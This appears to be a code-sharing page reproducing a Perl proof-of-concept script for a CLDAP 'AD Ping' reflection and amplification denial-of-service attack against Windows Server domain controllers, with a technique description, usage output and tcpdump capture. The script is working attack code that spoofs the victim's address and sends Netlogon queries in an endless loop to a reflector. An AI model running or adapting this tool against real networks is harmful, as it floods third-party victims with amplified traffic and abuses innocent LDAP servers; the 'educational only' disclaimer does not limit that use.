扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 |
#!/usr/bin/perl # #MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon #(CLDAP "AD Ping") query reflection DoS PoC # #Copyright 2016 (c) Todor Donev #Varna, Bulgaria #todor.donev@gmail.com #https://www.ethical-hacker.org/ #https://www.facebook.com/ethicalhackerorg #http://pastebin.com/u/hackerscommunity # #MS Windows Server 2016 [NOT TESTED !!!] # #Description: #The attackersends a simple query to a vulnerable reflector #supporting the Connectionless LDAP service (CLDAP) and using #address spoofing makes it appear to originate from the intended #victim. The CLDAP service responds to the spoofed address, #sending unwanted network traffic to the attacker’s intended target. # #Amplification techniques allow bad actors to intensify the size #of their attacks, because the responses generated by the LDAP #servers are much larger than the attacker’s queries. In this case, #the LDAP service responses are capable of reaching very high #bandwidth and we have seen an average amplification factor of #46x and a peak of 55x. # # #Disclaimer: #This or previous program is for Educational purpose ONLY. Do not #use it without permission. The usual disclaimer applies, especially #the fact that Todor Donev is not liable for any damages caused by #direct or indirect use of the information or functionality provided #by these programs. The author or any Internet provider bears NO #responsibility for content or misuse of these programs or any #derivatives thereof. By using these programs you accept the fact #that any damage (dataloss, system crash, system compromise, etc.) #caused by the use of these programs is not Todor Donev's #responsibility. # #Use at your own risk and educational #purpose ONLY! # #See also, UDP-based Amplification Attacks: #https://www.us-cert.gov/ncas/alerts/TA14-017A # # ## perl cldapdrdos.pl 192.168.1.112 192.168.1.146 #[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC #[ ====== #[ Usg: cldapdrdos.pl <ldap server> <target> <port> #[ Default port: 389 #[ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1 #[ ====== #[ <todor.donev@gmail.com> Todor Donev #[ Facebook: https://www.facebook.com/ethicalhackerorg #[ Website: https://www.ethical-hacker.org/ #[ Sending CLDAP "AD Ping" packets.. #^C ## tcpdump -i eth0 -c4 port 389 #tcpdump: verbose output suppressed, use -v or -vv for full protocol decode #listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes #00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57 #00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL... #00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57 #00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315## LOOOL... #4 packets captured #6 packets received by filter #0 packets dropped by kernel # # # use Net::RawIP; print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n"; print "[ ======\n"; print "[ Usg: $0 <ldap server> <target> <port>\n"; print "[ Default port: 389\n"; print "[ Example: perl $0 192.168.30.56 192.168.1.1\n"; print "[ ======\n"; print "[ <todor.donev\@gmail.com> Todor Donev\n"; print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n"; print "[ Website: https://www.ethical-hacker.org/\n"; my $cldap = $ARGV[0]; my $target= $ARGV[1]; my $port= $ARGV[2] || '389'; die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535); my $query= "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a"; $query.= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01"; $query.= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65"; $query.= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00"; $query.= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e"; $query.= "\x65\x74\x6c\x6f\x67\x6f\x6e"; my $sock =new Net::RawIP({ udp => {} }) or die; print "[ Sending CLDAP \"AD Ping\" packets..\n"; while () { select(undef, undef, undef, 0.40); # Sleep 400 milliseconds $sock->set({ip =>{ saddr=> $target, daddr => $cldap}, udp =>{ source => 31337, dest=> $port, data => $query} }); $sock->send; } |
体验盒子
